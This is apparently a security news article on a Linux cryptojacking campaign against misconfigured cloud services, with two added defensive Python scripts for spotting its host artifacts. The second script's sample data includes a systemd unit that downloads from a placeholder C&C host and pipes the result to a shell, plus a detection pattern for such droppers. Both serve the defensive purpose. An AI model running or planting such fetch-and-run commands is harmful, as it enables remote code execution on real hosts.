Linux Malware Campaign Targets Misconfigured Cloud Servers

A new malware campaign has been observed targeting misconfigured Apache Hadoop, Confluence, Docker, and Redis instances.

A cryptojacking campaign involving Linux malware is targeting misconfigured Apache Hadoop, Confluence, Docker, and Redis instances with new and unique malicious payloads, cybersecurity firm Cado Security warns.

As part of the campaign, the attackers employ four new Golang payloads to automate the discovery and exploitation of vulnerable hosts, as well as a reverse shell and multiple user-mode rootkits to hide their presence.

In attacks targeting Docker, the threat actors spawned a new container and created a bind mount of the server’s root directory, which allowed them to write an executable to the host that connects to the attackers’ command-and-control (C&C) server and retrieves a first-stage payload from it.
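A container that bind-mounts the host’s root directory is the artifact defenders can look for on a Docker host. The script below is an added example, not code from the article or from Cado Security: it parses the JSON that `docker inspect` emits and reports every bind mount whose host source is `/` or another sensitive path, reading both the `Mounts` list and `HostConfig.Binds` (the same mount appears in both when declared with `-v /:/mnt`). The inspect output embedded in the block is constructed for the example; the list of sensitive paths is an assumption to tune per environment.

```python
import json
import subprocess

# Host paths whose bind-mounting into a container effectively hands the
# container the host. Assumed threshold for this example; extend as needed.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/proc", "/sys", "/var/run/docker.sock"}

# Constructed sample of `docker inspect` output: one container with the
# host root mounted read-write (as in the campaign), one benign web app.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "deadbeef0001",
        "Name": "/suspicious",
        "HostConfig": {"Binds": ["/:/mnt:rw"], "Privileged": False},
        "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt", "RW": True}],
    },
    {
        "Id": "cafef00d0002",
        "Name": "/webapp",
        "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
        "Mounts": [
            {"Type": "bind", "Source": "/srv/www", "Destination": "/usr/share/nginx/html", "RW": False},
            {"Type": "volume", "Name": "logs", "Source": "/var/lib/docker/volumes/logs/_data",
             "Destination": "/var/log/nginx", "RW": True},
        ],
    },
])


def _normalise(path: str) -> str:
    """Strip trailing slashes so "/" and "" (from "/:/mnt") compare equal."""
    path = path.rstrip("/")
    return path or "/"


def risky_bind_mounts(inspect_output: str) -> list:
    """Return bind mounts of sensitive host paths found in `docker inspect` JSON.

    Each finding is a dict with container, source, destination and rw flag.
    Mounts declared via `Mounts` and via `HostConfig.Binds` are merged so a
    single mount is reported once.
    """
    seen = {}  # (container, source, destination) -> rw
    for container in json.loads(inspect_output):
        name = container.get("Name", "").lstrip("/")
        for m in container.get("Mounts", []):
            if m.get("Type") != "bind":
                continue  # named volumes live under /var/lib/docker, not the host root
            src = _normalise(m.get("Source", ""))
            if src in SENSITIVE_HOST_PATHS:
                key = (name, src, m.get("Destination"))
                seen[key] = seen.get(key, False) or bool(m.get("RW", True))
        for bind in (container.get("HostConfig") or {}).get("Binds") or []:
            parts = bind.split(":")  # "src:dst[:opts]" (Linux paths, no drive letters)
            if len(parts) < 2:
                continue
            src = _normalise(parts[0])
            if src in SENSITIVE_HOST_PATHS:
                opts = parts[2].split(",") if len(parts) > 2 else []
                key = (name, src, parts[1])
                seen[key] = seen.get(key, False) or ("ro" not in opts)
    return [
        {"container": c, "source": s, "destination": d, "rw": rw}
        for (c, s, d), rw in sorted(seen.items())
    ]


def inspect_running_containers() -> str:
    """Collect `docker inspect` JSON for all running containers on this host."""
    ids = subprocess.run(["docker", "ps", "-q"], capture_output=True, text=True, check=True).stdout.split()
    if not ids:
        return "[]"
    return subprocess.run(["docker", "inspect", *ids], capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    try:
        data = inspect_running_containers()
    except (FileNotFoundError, subprocess.CalledProcessError):
        data = SAMPLE_INSPECT  # no Docker here: demonstrate on the constructed sample
    for finding in risky_bind_mounts(data):
        print(f"[!] {finding['container']}: host {finding['source']} mounted at "
              f"{finding['destination']} ({'rw' if finding['rw'] else 'ro'})")
```

Run it periodically on Docker hosts, or feed it `docker inspect` output collected by your fleet tooling. A read-write mount of `/` by a container nobody recognises is the precise condition the campaign depends on and should be treated as a host compromise, not a container misconfiguration.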

The payload is a shell script that can define a C&C server hosting additional payloads, check for the existence of a utility and rename it, install and rename the utility if it is not present, and determine whether root access is available and fetch a payload accordingly.

The attackers were also seen deploying a second shell script for the delivery of an XMRig miner, a script, and various utilities, including ‘masscan’ for host discovery. The shell script also deletes shell history and weakens the host’s defenses by disabling SELinux and other protections and by uninstalling monitoring agents.

The script was also seen deploying the ‘libprocesshider’ and ‘diamorphine’ user-mode rootkits to hide malicious processes. The use of these rootkits resembles a recently observed Migo malware campaign targeting Redis servers.

Furthermore, the script can insert an attacker-controlled SSH key and register systemd services for persistence, retrieve the open source Golang reverse shell utility Platypus, discover SSH keys and spread malware via SSH commands, and deploy an additional binary.
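The tampering described in the last three paragraphs leaves artifacts on the host: a library forced into every process through /etc/ld.so.preload (the mechanism the ‘libprocesshider’ rootkit uses), SELinux switched off in its config, an authorized_keys entry nobody issued, and a systemd unit whose ExecStart fetches or runs code from a temporary directory. The audit below is an added example, not code from the article or from Cado Security; it checks each of these from file contents so the checks can be exercised against the constructed samples embedded in the block, and `audit_host` reads the real files when run on a host. The known-key allowlist, the heuristic pattern for dropper-style units and all sample values are assumptions for the example.

```python
import glob
import json
import os
import re

# Constructed sample inputs standing in for the real files on a host.
SAMPLE_LD_PRELOAD = "# system preloads\n/usr/local/lib/libprocesshider.so\n"
SAMPLE_SELINUX_CONFIG = "# This file controls the state of SELinux\nSELINUX=disabled\nSELINUXTYPE=targeted\n"
SAMPLE_AUTHORIZED_KEYS = (
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEOPSKEY ops@bastion\n"
    'command="/bin/sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABEXAMPLEDROPPEDKEY nobody@nowhere\n'
)
KNOWN_KEY_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEOPSKEY"}  # assumed allowlist of issued keys
SAMPLE_UNITS = {
    "nginx.service": "[Service]\nExecStart=/usr/sbin/nginx -g 'daemon on;'\n",
    # c2.example.invalid is a placeholder; the article does not publish the real C&C.
    "syslogd.service": "[Service]\nExecStart=/bin/sh -c 'curl -s http://c2.example.invalid/x | sh'\n",
}

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-ssh-", "sk-ecdsa-")
# Heuristic: ExecStart lines that run from world-writable dirs or pipe a download into a shell.
DROPPER_PATTERN = re.compile(r"(/tmp/|/dev/shm/|/var/tmp/|\bcurl\b|\bwget\b|\| *sh\b|base64 -d)")


def ld_preload_entries(text: str) -> list:
    """Libraries injected into every dynamically linked process. A clean host
    normally has no /etc/ld.so.preload at all, so any entry deserves a look."""
    return [ln.strip() for ln in text.splitlines() if ln.strip() and not ln.lstrip().startswith("#")]


def selinux_disabled(config_text: str) -> bool:
    """True when /etc/selinux/config sets SELINUX=disabled (persists across reboots)."""
    for ln in config_text.splitlines():
        m = re.match(r"\s*SELINUX\s*=\s*(\w+)", ln)
        if m:
            return m.group(1).lower() == "disabled"
    return False


def unexpected_ssh_keys(authorized_keys_text: str, known_blobs: set) -> list:
    """Entries whose key blob is not in the allowlist. Tokenises on whitespace,
    so it assumes key options (the optional leading field) contain no spaces."""
    findings = []
    for ln in authorized_keys_text.splitlines():
        tokens = ln.split()
        if not tokens or tokens[0].startswith("#"):
            continue
        for i, tok in enumerate(tokens):
            if tok.startswith(KEY_TYPES) and i + 1 < len(tokens):
                blob = tokens[i + 1]
                if blob not in known_blobs:
                    findings.append({"type": tok, "comment": " ".join(tokens[i + 2:]),
                                     "options": " ".join(tokens[:i])})
                break
    return findings


def suspicious_systemd_units(units: dict) -> list:
    """Unit names (name -> file content) whose ExecStart matches DROPPER_PATTERN."""
    flagged = []
    for name, content in units.items():
        if any(ln.startswith("ExecStart=") and DROPPER_PATTERN.search(ln) for ln in content.splitlines()):
            flagged.append(name)
    return sorted(flagged)


def _read(path: str) -> str:
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def audit_host(root: str = "/", known_blobs: set = frozenset()) -> dict:
    """Run all checks against the files under `root` (root needed for /root/.ssh)."""
    units = {os.path.basename(p): _read(p)
             for p in glob.glob(os.path.join(root, "etc/systemd/system/*.service"))}
    return {
        "ld_preload": ld_preload_entries(_read(os.path.join(root, "etc/ld.so.preload"))),
        "selinux_disabled": selinux_disabled(_read(os.path.join(root, "etc/selinux/config"))),
        "unexpected_root_keys": unexpected_ssh_keys(_read(os.path.join(root, "root/.ssh/authorized_keys")), known_blobs),
        "suspicious_units": suspicious_systemd_units(units),
    }


if __name__ == "__main__":
    print(json.dumps(audit_host(known_blobs=KNOWN_KEY_BLOBS), indent=2))
```

The checks are deliberately file-based rather than process-based: a preload rootkit hides processes from `ps` but cannot hide the line in /etc/ld.so.preload that loads it, and a forensic image or a read-only mount of the disk can be audited by pointing `root` at it. Pair the SSH check with a maintained inventory of issued public keys; without an allowlist every key is "unexpected".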

The Golang payloads deployed in these attacks allow attackers to search for Docker images from the Ubuntu or Alpine repositories and delete them, and identify and exploit misconfigured or vulnerable Hadoop, Confluence, Docker, and Redis instances exposed to the internet.

In attacks targeting Confluence servers, the threat actors were seen exploiting CVE-2022-26134, a critical remote code execution flaw patched in June 2022, when it was already exploited as a zero-day.

“This extensive attack demonstrates the variety in initial access techniques available to cloud and Linux malware developers. It’s clear that attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments,” Cado notes.

Related: ‘Leaky Vessels’ Container Escape Vulnerabilities Impact Docker, Others

Related: MySQL Servers, Docker Hosts Infected With DDoS Malware

Related: P2PInfect: New Peer-to-Peer Worm Targeting Redis Servers

Copyright © 2026 SecurityWeek ®, a Wired Business Media Publication. All Rights Reserved.